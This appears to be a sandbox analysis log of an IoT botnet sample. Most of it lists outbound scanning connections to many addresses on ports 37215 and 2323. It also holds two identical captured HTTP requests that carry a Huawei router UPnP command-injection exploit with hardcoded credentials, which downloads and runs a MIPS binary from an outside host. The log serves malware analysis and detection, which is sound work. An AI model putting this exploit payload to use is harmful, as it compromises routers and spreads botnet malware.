            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.98.24.201:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.248.217.45:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.106.231.87:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.133.108.31:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.173.29.100:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 177.141.225.120:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.42.198.43:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.176.39.46:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 137.208.160.176:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.85.12.50:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.240.223.147:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.59.207.20:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.72.122.128:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 165.135.30.121:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.14.196.102:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.192.166.251:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 181.144.23.231:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.210.31.214:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 222.223.39.76:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 62.23.150.2:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.126.100.21:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.168.125.227:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 216.126.180.249:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.113.0.253:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.143.220.241:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 223.51.124.166:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 38.19.87.240:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 50.224.34.154:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.227.63.81:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 114.201.141.161:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.205.44.211:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.169.177.197:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.160.86.127:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.186.27.100:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.86.216.111:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 20.21.109.74:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.188.86.1:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 120.127.37.235:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.144.129.60:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 58.192.215.5:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.249.38.177:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.126.191.154:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.20.82.108:37215
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 207.11.51.130:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 122.251.159.191:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 87.57.135.162:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 140.158.16.234:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 141.137.121.179:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 102.166.209.141:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 213.219.154.213:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 164.187.49.190:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 91.128.144.188:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 60.191.230.164:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 218.206.48.202:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 35.126.98.89:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 95.107.78.226:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 101.172.210.115:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 13.38.97.43:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 9.60.127.45:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 190.139.43.192:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 40.85.106.131:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 93.210.80.28:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 198.76.144.29:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 72.77.217.27:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 156.0.64.147:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 129.39.212.158:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 217.127.168.4:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 147.172.10.40:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 101.178.168.118:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 86.139.213.62:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 96.220.29.34:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 157.157.10.61:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 142.153.141.147:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 137.41.247.63:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 169.72.156.179:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 133.12.87.74:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 18.92.8.99:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 81.221.111.150:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 200.243.135.251:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 4.233.226.181:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 72.188.193.84:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 139.236.229.207:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 85.189.200.68:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 113.72.252.144:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 121.54.236.113:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 216.72.159.74:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 202.225.209.137:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 174.91.215.27:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 108.148.94.88:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 92.218.255.181:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 220.70.5.150:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 140.218.150.34:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 116.137.224.134:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 46.91.143.28:2323
            Source: global trafficTCP traffic: 192.168.2.15:54078 -> 141.98.7.43:1985
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 128.11.79.247:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 181.97.250.68:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 153.62.188.3:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 217.239.5.14:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 13.233.44.40:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 60.159.62.3:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 134.248.103.0:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 160.60.184.87:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 89.145.75.145:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 219.83.38.227:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 101.62.226.97:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 152.110.138.136:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 19.187.222.172:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 13.102.226.244:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 4.23.203.24:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 47.27.162.149:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 175.144.78.192:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 187.216.1.15:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 182.150.111.41:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 211.131.144.150:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 91.97.75.53:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 5.52.143.63:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 94.195.88.38:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 144.185.247.210:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 77.181.97.223:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 79.201.58.199:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 76.236.54.70:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 171.22.129.45:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 65.253.38.231:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 68.66.74.196:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 190.40.193.74:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 14.50.43.88:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 221.55.71.81:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 149.100.184.118:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 136.234.199.201:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 218.117.180.252:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 78.81.72.35:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 62.183.52.81:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 126.6.248.243:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 136.163.254.0:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 99.12.131.34:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 182.210.134.81:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 94.241.26.149:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 101.227.193.118:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 94.111.63.244:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 82.245.30.55:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 99.144.32.155:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 210.106.240.54:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 204.240.170.244:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 53.245.252.63:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 148.10.210.38:2323
            Source: global trafficTCP traffic: 192.168.2.15:28751 -> 87.31.231.199:2323
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.223.170.191:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.26.77.230:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.136.233.176:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 125.56.11.105:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.15.151.145:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.142.30.251:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.163.31.147:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 62.201.212.55:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.232.135.41:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.47.102.45:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.108.20.181:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 51.169.132.171:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.247.43.197:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 212.250.52.33:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.223.195.62:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.177.82.109:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 72.72.92.151:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.157.15.228:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.103.61.133:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.174.82.44:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.220.25.115:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.146.73.28:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.246.143.239:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.54.67.167:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.218.14.173:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.29.218.164:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.82.12.158:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.63.179.198:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.206.161.94:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 153.146.7.109:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 123.245.125.182:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.184.48.183:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 100.166.56.23:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 119.15.85.74:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.174.119.74:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.4.68.77:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 91.124.146.35:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.69.195.61:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.176.113.165:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.236.230.200:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.51.251.230:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.112.111.96:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.127.210.193:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.20.75.8:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 156.106.37.179:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 66.33.91.250:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.205.48.62:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.232.123.79:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.195.67.207:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.14.108.42:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.0.18.40:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 40.36.49.82:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.242.106.124:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 126.114.181.172:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.196.71.9:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.63.145.44:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.40.117.83:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.39.227.79:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.15.248.50:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.107.153.9:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.207.24.255:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.121.243.38:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.54.19.73:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.232.236.101:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.219.28.68:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.91.103.91:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.159.165.50:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.236.71.160:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.148.164.37:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.197.115.108:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.251.114.113:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 201.143.3.15:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 155.176.79.232:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.25.103.190:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 143.243.241.105:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.152.140.9:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.107.212.77:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.244.93.238:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.253.29.236:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.123.213.129:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.208.164.44:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.60.230.199:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.222.79.125:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 179.45.46.38:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.201.193.116:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.103.229.148:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.76.219.216:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.145.46.190:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.76.2.214:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 158.57.66.166:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.117.251.205:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.130.41.48:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 183.2.156.62:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.82.222.17:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 223.35.75.73:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.40.49.196:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.168.225.245:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.156.65.193:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.111.122.112:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 114.167.187.195:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.238.35.149:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.15.230.14:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.206.192.38:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.148.39.141:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.123.255.218:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 118.232.46.164:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.55.252.44:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.247.75.87:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.139.59.95:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.105.241.14:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.156.139.163:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.227.92.170:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.117.92.197:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.224.24.94:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.76.141.147:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.104.119.118:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.231.233.102:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.228.120.204:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.66.66.67:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.206.181.90:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 61.133.125.140:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.63.75.168:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.75.192.117:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.188.135.153:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 195.47.108.166:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.198.138.198:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.70.166.42:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.117.178.112:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.47.65.165:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.204.81.30:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.233.179.145:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.81.95.116:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.139.10.168:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.185.125.15:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.82.125.239:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 197.85.110.156:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 119.40.229.89:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 41.10.228.229:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 206.197.255.229:37215
            Source: global trafficTCP traffic: 192.168.2.15:36431 -> 157.77.86.172:37215
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
